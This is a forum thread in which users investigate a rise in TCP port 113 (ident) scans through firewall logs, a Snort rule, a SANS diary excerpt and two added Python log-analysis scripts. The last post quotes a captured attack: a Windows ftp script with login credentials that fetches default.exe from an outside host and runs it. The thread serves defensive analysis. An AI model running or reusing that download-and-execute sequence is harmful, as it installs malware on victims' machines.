 kpatz MY HEAD A SPLODE Premium join:2003-06-13 Manchester, NH
Increase in Ident (TCP 113) scans lately?
I've noticed a lot of unsolicited scans on TCP 113 (auth/ident) lately. In the past I rarely saw scans on this port unless I hit certain ftp or IRC sites. Now I'm seeing a bunch of IPs scanning it.
Is there a new exploit or backdoor that uses this port?
Oops, I may have answered my own question: »isc.incidents.org/port_details.php?port=113
Looks like Korgo listens on this port. Anywho, anyone else seeing scans in the past day or so? -- Robert Tappan Morris, Jr., got six months in jail for crashing 10% of the computers that Bill Gates made $100 million crashing last weekend.
 kpatz MY HEAD A SPLODE Premium join:2003-06-13 Manchester, NH
Bumping... as scans on 113 seem to be high this morning. Here's a quick snapshot of some of the most recent scans:
quote:
Jul 1 08:03:46 linux1 kernel: Packet log: input DENY eth0 PROTO=6 211.210.123.13:2483 xxx.xxx.xxx.xxx:113 L=48 S=0x80 I=20444 F=0x4000 T=110 SYN (#26)
Jul 1 08:03:49 linux1 kernel: Packet log: input DENY eth0 PROTO=6 211.210.123.13:2483 xxx.xxx.xxx.xxx:113 L=48 S=0x80 I=21366 F=0x4000 T=110 SYN (#26)
Jul 1 08:07:17 linux1 kernel: Packet log: input DENY eth0 PROTO=6 221.141.186.79:1845 xxx.xxx.xxx.xxx:113 L=48 S=0x80 I=3872 F=0x4000 T=109 SYN (#26)
Jul 1 08:07:20 linux1 kernel: Packet log: input DENY eth0 PROTO=6 221.141.186.79:1845 xxx.xxx.xxx.xxx:113 L=48 S=0x80 I=5931 F=0x4000 T=109 SYN (#26)
Jul 1 08:07:30 linux1 kernel: Packet log: input DENY eth0 PROTO=6 210.115.43.81:2042 xxx.xxx.xxx.xxx:113 L=48 S=0x80 I=60595 F=0x4000 T=104 SYN (#26)
Jul 1 08:07:33 linux1 kernel: Packet log: input DENY eth0 PROTO=6 210.115.43.81:2042 xxx.xxx.xxx.xxx:113 L=48 S=0x80 I=387 F=0x4000 T=104 SYN (#26)
Jul 1 08:08:56 linux1 kernel: Packet log: input DENY eth0 PROTO=6 218.233.40.177:4849 xxx.xxx.xxx.xxx:113 L=48 S=0x80 I=24831 F=0x4000 T=109 SYN (#26)
Jul 1 08:09:00 linux1 kernel: Packet log: input DENY eth0 PROTO=6 218.233.40.177:4849 xxx.xxx.xxx.xxx:113 L=48 S=0x80 I=25891 F=0x4000 T=109 SYN (#26)
Jul 1 08:14:12 linux1 kernel: Packet log: input DENY eth0 PROTO=6 218.232.115.83:4072 xxx.xxx.xxx.xxx:113 L=48 S=0x80 I=50734 F=0x4000 T=110 SYN (#26)
Jul 1 08:14:15 linux1 kernel: Packet log: input DENY eth0 PROTO=6 218.232.115.83:4072 xxx.xxx.xxx.xxx:113 L=48 S=0x80 I=53558 F=0x4000 T=110 SYN (#26)
Jul 1 08:17:59 linux1 kernel: Packet log: input DENY eth0 PROTO=6 218.232.130.135:1456 xxx.xxx.xxx.xxx:113 L=48 S=0x80 I=60120 F=0x4000 T=110 SYN (#26)
Jul 1 08:18:03 linux1 kernel: Packet log: input DENY eth0 PROTO=6 218.232.130.135:1456 xxx.xxx.xxx.xxx:113 L=48 S=0x80 I=60605 F=0x4000 T=110 SYN (#26)
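As an added example (not code from the thread), here is a small Python parser for the ipchains-style "Packet log:" lines kpatz quoted above. It groups DENY entries to port 113 by source address, collapses the paired entries a few seconds apart (which look like a SYN retransmission rather than a second probe) into one connection attempt, and maps the observed TTL to a likely initial TTL and hop count. The sample log lines are constructed to mirror the quoted format, with a documentation-range destination address in place of the masked one; the TTL mapping is a heuristic of mine, not something the thread states.

```python
import re
from collections import defaultdict
from datetime import datetime

# Matches the ipchains-style "Packet log:" lines quoted in the thread.
LOG_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) \S+ kernel: "
    r"Packet log: (?P<chain>\w+) (?P<action>\w+) (?P<iface>\S+) PROTO=(?P<proto>\d+) "
    r"(?P<src>[\d.]+):(?P<sport>\d+) (?P<dst>[\d.x]+):(?P<dport>\d+) "
    r"L=(?P<len>\d+) S=(?P<tos>0x[0-9a-fA-F]+) I=(?P<id>\d+) F=(?P<frag>0x[0-9a-fA-F]+) "
    r"T=(?P<ttl>\d+)(?: (?P<flags>[A-Z]+))?(?: \(#(?P<rule>\d+)\))?"
)

# Constructed sample, modelled on the lines in the post (destination is RFC 5737 space).
SAMPLE_LOG = """\
Jul  1 08:03:46 linux1 kernel: Packet log: input DENY eth0 PROTO=6 211.210.123.13:2483 192.0.2.10:113 L=48 S=0x80 I=20444 F=0x4000 T=110 SYN (#26)
Jul  1 08:03:49 linux1 kernel: Packet log: input DENY eth0 PROTO=6 211.210.123.13:2483 192.0.2.10:113 L=48 S=0x80 I=21366 F=0x4000 T=110 SYN (#26)
Jul  1 08:07:17 linux1 kernel: Packet log: input DENY eth0 PROTO=6 221.141.186.79:1845 192.0.2.10:113 L=48 S=0x80 I=3872 F=0x4000 T=109 SYN (#26)
Jul  1 08:07:20 linux1 kernel: Packet log: input DENY eth0 PROTO=6 221.141.186.79:1845 192.0.2.10:113 L=48 S=0x80 I=5931 F=0x4000 T=109 SYN (#26)
Jul  1 08:09:00 linux1 kernel: Packet log: input DENY eth0 PROTO=6 221.141.186.79:1901 192.0.2.10:113 L=48 S=0x80 I=7001 F=0x4000 T=109 SYN (#26)
Jul  1 08:10:02 linux1 kernel: Packet log: input DENY eth0 PROTO=6 198.51.100.7:3311 192.0.2.10:135 L=48 S=0x00 I=1200 F=0x4000 T=120 SYN (#26)
Jul  1 08:10:05 linux1 sshd[412]: Accepted publickey for admin from 203.0.113.5
"""


def parse_packet_log(line):
    """Parse one kernel packet-log line; return a dict, or None if the line is not one."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    for key in ("proto", "sport", "dport", "len", "id", "ttl"):
        rec[key] = int(rec[key])
    rec["rule"] = int(rec["rule"]) if rec["rule"] else None
    # Syslog timestamps carry no year; strptime defaults to 1900, which is fine for deltas.
    rec["ts"] = datetime.strptime(f"{rec['mon']} {rec['day']} {rec['time']}", "%b %d %H:%M:%S")
    return rec


def guess_initial_ttl(ttl):
    """Heuristic (mine): map an observed TTL to the nearest common initial TTL and hop count."""
    for initial in (32, 64, 128, 255):
        if ttl <= initial:
            return initial, initial - ttl
    return None


def summarize_port_scans(lines, port=113, retry_window=5):
    """Group DENY entries for `port` by source IP.

    Two hits from the same src:sport within `retry_window` seconds are counted as a
    single attempt (a SYN retransmission), which is what the paired entries look like.
    """
    by_src = defaultdict(lambda: {"hits": 0, "attempts": 0, "ttl": set(), "last": {}})
    for line in lines:
        rec = parse_packet_log(line)
        if rec is None or rec["action"] != "DENY" or rec["proto"] != 6 or rec["dport"] != port:
            continue
        s = by_src[rec["src"]]
        s["hits"] += 1
        s["ttl"].add(rec["ttl"])
        prev = s["last"].get(rec["sport"])
        if prev is None or (rec["ts"] - prev).total_seconds() > retry_window:
            s["attempts"] += 1
        s["last"][rec["sport"]] = rec["ts"]
    return {src: {"hits": v["hits"], "attempts": v["attempts"], "ttl": sorted(v["ttl"])}
            for src, v in by_src.items()}


if __name__ == "__main__":
    for src, info in summarize_port_scans(SAMPLE_LOG.splitlines()).items():
        ttl_guess = guess_initial_ttl(info["ttl"][0])
        print(f"{src:16} hits={info['hits']} attempts={info['attempts']} "
              f"ttl={info['ttl']} initial/hops={ttl_guess}")
```

Run against a real log, the per-source attempt count separates a handful of retransmitting hosts from a genuine flood, and a TTL that is constant per source while the source ports increment is consistent with the "SYN only" behaviour described later in the thread.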
  Randy Bell Premium join:2002-02-24 Santa Clara, CA
reply to kpatz Even four screenshots from VisualZone can't capture all my 113 hits during the past ten days. Thanks for the heads-up; there do seem to be a bunch of hits. -- "But now abide faith, hope, love, these three; but the greatest of these is love." (1 Cor. 13:13)
 CrookedSmile
join:2003-08-23
reply to kpatz I was just popping in to post a question about this. I haven't had anything on 113 against my system until this morning, and now I have gotten over 600 hits in the last few hours. Has anyone caught data from it yet to see what it is?
-- corrected: misread my hit counter, and corrected a spelling error.
 kpatz MY HEAD A SPLODE Premium join:2003-06-13 Manchester, NH
I'm surprised Blake (Link Logger) hasn't chimed in here; he's the honeypot guy 'round these parts.
I could toss a pot up, but the 113 scans seem to have stopped, at least for now. If they start in again I'll see if I can capture something.
 CrookedSmile
join:2003-08-23
reply to kpatz I'm still picking up a couple of hits a minute. Is this right for making Snort capture this port's traffic?
alert tcp $EXTERNAL_NET any -> $HOME_NET 113 (msg:"funky 113"; classtype:bad-unknown; sid:1000001; rev:1;)
kpatz MY HEAD A SPLODE Premium join:2003-06-13 Manchester, NH
I'm the wrong guy to ask; I've never used Snort. I have a home-brew TCP honeypot I run on my Linux box.
SyStEmF
join:2004-05-19 Bloomfield Hills, MI
reply to kpatz »isc.incidents.org/port_details.php?port=113
CrookedSmile
join:2003-08-23
reply to kpatz Never mind. It's already passed on my IP, and the new Snort rule didn't have anything to capture after it was reloaded. Consequence of a slow machine. I wonder which type of router it is with the ident flaw that is the target of this flooding.
kpatz MY HEAD A SPLODE Premium join:2003-06-13 Manchester, NH
I just checked my FW log and saw some 113 scans, so I opened the port and put up a listener. I'll post back if it captures something.
  catseyenu Ack Pfft Premium join:2001-11-17 Fix East
reply to SyStEmF »isc.incidents.org/port_details.php?port=113
 CrookedSmile
join:2003-08-23
reply to kpatz It seems everyone has a copy of the same link to the SANS site to answer the thread. Since I doubt that y'all are posting it for Randy Bell's benefit, and I'm the only other person posting without it in one of my posts, I have to assume it's for my benefit somehow. Thanks. I caught it the first time around from kpatz's first post. It's very similar to DShield's information on that port. By the way, that's a killer animated avatar, catseyenu. This all aside, I pruned this out of the SANS handlers' diary for July 1. Would've provided the link, but it doesn't seem necessary since there are already enough to their server here to give a good jump point.
AUTH/IDENT Probes
The sensor also picked up quite a few probes to TCP/113, the auth/ident service port. There is a rise in scanning sources reported on DShield, and a few reports have come in to the handlers' list. I was able to capture the traffic and it was in the form of (1026 , 25.) where the first number was a 4-digit number while the 25 was fixed. A quick read of RFC 1413 indicates that these are ident requests from a server in response to a connection from my sensor's IP (source port being the 4-digit number) to their port 25 (SMTP). Since my sensor didn't send out any connections, it appears that these SMTP connections are spoofed.
Guess I was guessing wrong in my guess earlier. Not the first or the last time for that to happen.
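The diary excerpt above describes the RFC 1413 request format, "<port-on-server> , <port-on-client>", where the first port belongs to the host running identd and the second to the host asking. As an added example (not code from the thread or from the SANS diary), the Python below parses such requests, checks each one against a table of the host's own outbound connections (assumed to be supplied by the caller, e.g. from netstat) and labels queries for connections the host never made as backscatter from spoofed SMTP connections, which is the conclusion the diary draws. It also builds the RFC 1413 error reply an identd could return without disclosing a username. The queries and the connection table are constructed sample data.

```python
import re
from collections import Counter

# RFC 1413 request line: "<port-on-server> , <port-on-client>" followed by CRLF.
IDENT_REQ = re.compile(r"^\s*(\d{1,5})\s*,\s*(\d{1,5})\s*$")

# Constructed sample queries as (querier IP, raw request line). The first two mirror
# the "(1026 , 25)" pattern from the diary; the third is for a connection this host
# really made; the last two are malformed input an identd must also cope with.
SAMPLE_QUERIES = [
    ("192.0.2.25", "1026 , 25\r\n"),
    ("192.0.2.25", "1027 , 25\r\n"),
    ("198.51.100.6", "43210 , 6667\r\n"),
    ("203.0.113.9", "garbage\r\n"),
    ("203.0.113.9", "0 , 25\r\n"),
]

# Constructed table of this host's established outbound TCP connections as
# (local_port, remote_ip, remote_port); in practice built from netstat/ss output.
LOCAL_CONNECTIONS = {(43210, "198.51.100.6", 6667)}


def parse_ident_request(line):
    """Return (port_on_server, port_on_client) as ints, or None if the line is malformed."""
    m = IDENT_REQ.match(line)
    if m is None:
        return None
    return int(m.group(1)), int(m.group(2))


def valid_port(port):
    return 1 <= port <= 65535


def classify_ident_request(querier_ip, line, local_connections):
    """Classify one ident query and build the RFC 1413 reply an identd would send.

    Returns (label, reply). A query naming a connection we never opened is labelled
    'backscatter': someone else connected to the querier using our address.
    """
    parsed = parse_ident_request(line)
    if parsed is None:
        return "malformed", None          # nothing sensible to echo back
    local_port, remote_port = parsed
    if not (valid_port(local_port) and valid_port(remote_port)):
        return "invalid-port", f"{local_port} , {remote_port} : ERROR : INVALID-PORT"
    if (local_port, querier_ip, remote_port) in local_connections:
        # Real connection of ours; HIDDEN-USER answers without leaking the username.
        return "legitimate", f"{local_port} , {remote_port} : ERROR : HIDDEN-USER"
    return "backscatter", f"{local_port} , {remote_port} : ERROR : NO-USER"


def triage(queries, local_connections):
    """Classify every (querier_ip, line) pair; returns a list of (ip, label, reply)."""
    return [(ip,) + classify_ident_request(ip, line, local_connections) for ip, line in queries]


def count_by_label(results):
    """Tally labels so a flood of 'backscatter' stands out at a glance."""
    return dict(Counter(label for _, label, _ in results))


if __name__ == "__main__":
    results = triage(SAMPLE_QUERIES, LOCAL_CONNECTIONS)
    for ip, label, reply in results:
        print(f"{ip:14} {label:12} {reply}")
    print(count_by_label(results))
```

With a real connection table, a run of queries whose second port is always 25 and whose first port never matches anything local is exactly the signature the diary describes: mail servers dutifully asking about SMTP connections that were made in your name but not by you.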
 kpatz MY HEAD A SPLODE Premium join:2003-06-13 Manchester, NH
reply to kpatz Update: I've had a couple of hits on 113, but the listener hasn't logged anything, not even a zero-byte file. This means they're likely half-connection attempts (SYN only, no or negative response to ACK).
 CrookedSmile
join:2003-08-23
reply to kpatz Nothing here either. I picked up four lonely hits about 3 hours ago, but they were all SYN packets from 212.42.38.194 with a high source port number. Snort wasn't too much help, but it did give me this information:
LEN=60 TOS=0x00 PREC=0x00 TTL=48 ID=31225 DF PROTO=TCP SPT=52954 DPT=113 WINDOW=65535 RES=0x00 SYN URGP=0
LEN=60 TOS=0x00 PREC=0x00 TTL=48 ID=32819 DF PROTO=TCP SPT=52954 DPT=113 WINDOW=65535 RES=0x00 SYN URGP=0
LEN=60 TOS=0x00 PREC=0x00 TTL=48 ID=34933 DF PROTO=TCP SPT=52954 DPT=113 WINDOW=65535 RES=0x00 SYN URGP=0
LEN=44 TOS=0x00 PREC=0x00 TTL=48 ID=38124 DF PROTO=TCP SPT=52954 DPT=113 WINDOW=65535 RES=0x00 SYN URGP=0
This was probably just a scan of the web for open 113 ports, but this is all that has come in since the earlier deluge of hits. Not much at all to go on. I'm willing to let it rest, especially for the weekend. Thanks for your time and work, kpatz!
  Camping
@139.142.x.x
reply to kpatz Sorry guys, but I'm out of action as I'm on holidays for a couple of weeks, so I'm limited to a cell phone connection to get and reply to email. Honeypots are out of the question on this camp. My office is still logging stuff, so I can see what happened while I was away.
Blake
 kpatz MY HEAD A SPLODE Premium join:2003-06-13 Manchester, NH
I ran a 113 pot for a few days, but it only captured 0-byte files. And for some reason my capture program kept core dumping every time something connected to it. I'll have to figger that out.
Maybe I'll add a feature to have it send something upon connect; right now it only sends after it receives data.
Blake, enjoy your camping trip!
  Fred42
@82.133.x.x
reply to kpatz IDENT scans are sent by some misconfigured SMTP servers. Before they let you deliver a message, they try to verify your identity first. This means they won't accept your mail until their IDENT query has timed out. For faster mail delivery, it can be worth sending a TCP RST to these servers (i.e. give them a CLOSED response, not a FILTERED response).
I think some IRC servers also send IDENT scans, but again they're not needed, so sending a TCP RST might help there too.
Of course, the real solution would be for people to fix their misconfigured SMTP and IRC servers to stop sending these scans.
  Name Game Premium join:2002-07-07 North Myrtle Beach, SC
reply to kpatz Posted by vordak13 at GSF
Hi all, I work at the University of South Florida, and our College of Medicine (and apparently the whole campus) has been hit with some new infection.
When someone gets infected, their computer opens up port 113 and attempts to connect outside our network. This is stopped at the firewall, but it is causing much grief. All the computers so far have been found with a file named soundblaster.exe. The one I worked on had it in C:/Windows/prefetch. The exact filename on the one I worked on was something to the effect of soundblaster.exe.(numbers).pf). I know this was a bogus file because most of these computers have on-board audio cards, NOT Sound Blaster.
When we delete soundblaster.exe and all the references to it in the registry, port 113 closes and all is quiet, but reinfections are starting and we have no idea where this is coming from. I have done extensive searches on the web and have heard nothing about this type, though it has some attributes of Korgo. It does not appear to be email propagated, as most of the people who are getting this virus have little in common with the others infected.
Any assistance will be greatly appreciated.
»forum.gladiator-antivirus.com/in···54&st=0& -- Gladiator Security Forum »www.gladiator-antivirus.com/ Missing Kids http://www.missingkids.com/
 kpatz MY HEAD A SPLODE Premium join:2003-06-13 Manchester, NH
Although I haven't seen any unsolicited scans on 113 in a while (they were mostly taking place in July), I checked my logs from when I had a honeypot running on the port, and found one thing that was captured on 7/10:
quote:
echo open ftp.p2.webhosting.yahoo.com 21 >> xXx1.txt
echo uploadme2004 >> xXx1.txt
echo saud159159 >> xXx1.txt
echo binary >> xXx1.txt
echo hash >> xXx1.txt
echo get default.exe >> xXx1.txt
echo quit >> xXx1.txt
ftp -s:xXx1.txt
default.exe
dd
dd
dd
This would imply that "something" opens a remote shell on 113 and someone was attempting to exploit this remote shell to download some sort of malware from an FTP site and run it. Or a stupid script kiddie assumed that an open port 113 hosted a shell.
Most of the 113 connects my honeypot captured resulted in 0-byte captures or SYN-only scans.